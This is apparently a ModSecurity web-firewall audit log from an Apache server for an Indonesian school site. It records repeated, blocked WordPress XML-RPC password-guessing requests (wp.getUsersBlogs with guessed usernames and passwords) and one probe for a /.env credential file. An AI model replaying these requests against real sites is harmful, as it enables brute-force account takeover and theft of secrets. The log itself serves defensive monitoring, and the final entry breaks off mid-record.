Stopwatch2: 1745076307807232 666; combined=322, p1=289, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--529b4421-Z--
--70df4b0f-A--
[19/Apr/2025:22:25:31 +0700] aAPAaw6cTFSgLAHl7Po6zQAAAAE 103.236.140.4 50820 103.236.140.4 8181
--70df4b0f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--70df4b0f-C--
wp.getUsersBlogs
kasubagtu
adminadmin
--70df4b0f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--70df4b0f-E--
--70df4b0f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745076331194088 5680 (- - -)
Stopwatch2: 1745076331194088 5680; combined=4329, p1=532, p2=3591, p3=0, p4=0, p5=123, sr=90, sw=83, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--70df4b0f-Z--
--a309981c-A--
[19/Apr/2025:22:26:35 +0700] aAPAq-vDiFC_ir7MDwZCaAAAAEw 103.236.140.4 54300 103.236.140.4 8181
--a309981c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--a309981c-C--
wp.getUsersBlogs
kasubagtu
qweqwe
--a309981c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a309981c-E--
--a309981c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745076395675125 4991 (- - -)
Stopwatch2: 1745076395675125 4991; combined=3556, p1=471, p2=2902, p3=0, p4=0, p5=106, sr=80, sw=77, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a309981c-Z--
--8ce12538-A--
[19/Apr/2025:22:27:37 +0700] aAPA6evDiFC_ir7MDwZDYQAAAEU 103.236.140.4 57646 103.236.140.4 8181
--8ce12538-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--8ce12538-C--
wp.getUsersBlogs
kasubagtu
domain
--8ce12538-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8ce12538-E--
--8ce12538-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745076457298250 4394 (- - -)
Stopwatch2: 1745076457298250 4394; combined=3047, p1=378, p2=2483, p3=0, p4=0, p5=108, sr=69, sw=78, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8ce12538-Z--
--043cf85d-A--
[19/Apr/2025:22:28:37 +0700] aAPBJevDiFC_ir7MDwZD8gAAAE4 103.236.140.4 60938 103.236.140.4 8181
--043cf85d-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--043cf85d-C--
wp.getUsersBlogs
kasubagtu
qq123456
--043cf85d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--043cf85d-E--
--043cf85d-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745076517223529 4804 (- - -)
Stopwatch2: 1745076517223529 4804; combined=3759, p1=427, p2=3146, p3=0, p4=0, p5=109, sr=87, sw=77, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--043cf85d-Z--
--d548413f-A--
[19/Apr/2025:22:29:38 +0700] aAPBYuvDiFC_ir7MDwZE_wAAAFQ 103.236.140.4 35968 103.236.140.4 8181
--d548413f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d548413f-C--
wp.getUsersBlogs
kasubagtu
123456qwe
--d548413f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d548413f-E--
--d548413f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745076578781209 3293 (- - -)
Stopwatch2: 1745076578781209 3293; combined=2485, p1=372, p2=1990, p3=0, p4=0, p5=71, sr=62, sw=52, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d548413f-Z--
--390b7652-A--
[19/Apr/2025:22:30:39 +0700] aAPBn3Na4dA2HllpK_PaywAAAJA 103.236.140.4 39270 103.236.140.4 8181
--390b7652-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--390b7652-C--
wp.getUsersBlogs
kasubagtu
111qqq!!!
--390b7652-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--390b7652-E--
--390b7652-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745076639427344 4961 (- - -)
Stopwatch2: 1745076639427344 4961; combined=3449, p1=417, p2=2870, p3=0, p4=0, p5=96, sr=86, sw=66, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--390b7652-Z--
--44ec6f3f-A--
[19/Apr/2025:22:31:07 +0700] aAPBu-vDiFC_ir7MDwZF9gAAAFE 103.236.140.4 40824 103.236.140.4 8181
--44ec6f3f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--44ec6f3f-C--
wp.getUsersBlogs
kasubagtu
1234%^&*
--44ec6f3f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--44ec6f3f-E--
--44ec6f3f-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745076667725514 5197 (- - -)
Stopwatch2: 1745076667725514 5197; combined=3695, p1=443, p2=3069, p3=0, p4=0, p5=112, sr=84, sw=71, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--44ec6f3f-Z--
--a6973743-A--
[19/Apr/2025:22:31:45 +0700] aAPB4evDiFC_ir7MDwZGowAAAEc 103.236.140.4 42930 103.236.140.4 8181
--a6973743-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--a6973743-C--
wp.getUsersBlogs
kasubagtu
chelsea
--a6973743-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a6973743-E--
--a6973743-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745076705729784 5029 (- - -)
Stopwatch2: 1745076705729784 5029; combined=3754, p1=508, p2=3090, p3=0, p4=0, p5=92, sr=92, sw=64, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a6973743-Z--
--2659a348-A--
[19/Apr/2025:22:32:45 +0700] aAPCHUruoUXZj665VUFkbAAAANA 103.236.140.4 46094 103.236.140.4 8181
--2659a348-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--2659a348-C--
wp.getUsersBlogs
kasubagtu
chicken
--2659a348-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2659a348-E--
--2659a348-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745076765692101 4715 (- - -)
Stopwatch2: 1745076765692101 4715; combined=3233, p1=442, p2=2594, p3=0, p4=0, p5=111, sr=89, sw=86, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2659a348-Z--
--e53cde50-A--
[19/Apr/2025:22:33:46 +0700] aAPCWkruoUXZj665VUFlNQAAAM4 103.236.140.4 49372 103.236.140.4 8181
--e53cde50-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--e53cde50-C--
wp.getUsersBlogs
kasubagtu
superman
--e53cde50-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e53cde50-E--
--e53cde50-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745076826467509 4685 (- - -)
Stopwatch2: 1745076826467509 4685; combined=3352, p1=355, p2=2808, p3=0, p4=0, p5=107, sr=53, sw=82, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e53cde50-Z--
--feef5655-A--
[19/Apr/2025:22:34:50 +0700] aAPCmkruoUXZj665VUFmggAAAM8 103.236.140.4 52744 103.236.140.4 8181
--feef5655-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--feef5655-C--
wp.getUsersBlogs
kasubagtu
hellokitty
--feef5655-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--feef5655-E--
--feef5655-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745076890508809 5422 (- - -)
Stopwatch2: 1745076890508809 5422; combined=3881, p1=541, p2=3177, p3=0, p4=0, p5=96, sr=94, sw=67, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--feef5655-Z--
--c15d7161-A--
[19/Apr/2025:22:35:20 +0700] aAPCuA6cTFSgLAHl7PpDHAAAABM 103.236.140.4 54368 103.236.140.4 8181
--c15d7161-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 103.59.160.222
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 103.59.160.222
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: */*
--c15d7161-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c15d7161-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745076920902724 652 (- - -)
Stopwatch2: 1745076920902724 652; combined=279, p1=238, p2=0, p3=0, p4=0, p5=41, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c15d7161-Z--
--1a73447c-A--
[19/Apr/2025:22:35:50 +0700] aAPC1kruoUXZj665VUFnRAAAANQ 103.236.140.4 55958 103.236.140.4 8181
--1a73447c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--1a73447c-C--
wp.getUsersBlogs
kasubagtu
cooper
--1a73447c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1a73447c-E--
--1a73447c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (44+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745076950345109 3942 (- - -)
Stopwatch2: 1745076950345109 3942; combined=3071, p1=396, p2=2508, p3=0, p4=0, p5=96, sr=64, sw=71, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1a73447c-Z--
--e34ade40-A--
[19/Apr/2025:22:36:55 +0700] aAPDF3Na4dA2HllpK_PfcQAAAJY 103.236.140.4 59388 103.236.140.4 8181
--e34ade40-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--e34ade40-C--
wp.getUsersBlogs
kasubagtu
a801016
--e34ade40-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e34ade40-E--
--e34ade40-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745077015678458 5419 (- - -)
Stopwatch2: 1745077015678458 5419; combined=4066, p1=487, p2=3393, p3=0, p4=0, p5=111, sr=84, sw=75, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e34ade40-Z--
--476bc922-A--
[19/Apr/2025:22:37:57 +0700] aAPDVQ6cTFSgLAHl7PpE2QAAABQ 103.236.140.4 34434 103.236.140.4 8181
--476bc922-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 233
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--476bc922-C--
wp.getUsersBlogs
administrator
administrator1
--476bc922-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--476bc922-E--
--476bc922-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745077077156517 4983 (- - -)
Stopwatch2: 1745077077156517 4983; combined=3766, p1=476, p2=3120, p3=0, p4=0, p5=100, sr=88, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--476bc922-Z--
--fa097611-A--
[19/Apr/2025:22:38:57 +0700] aAPDkevDiFC_ir7MDwZLZQAAAEg 103.236.140.4 37686 103.236.140.4 8181
--fa097611-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 230
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--fa097611-C--
wp.getUsersBlogs
administrator
inesslatOK_
--fa097611-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fa097611-E--
--fa097611-H--
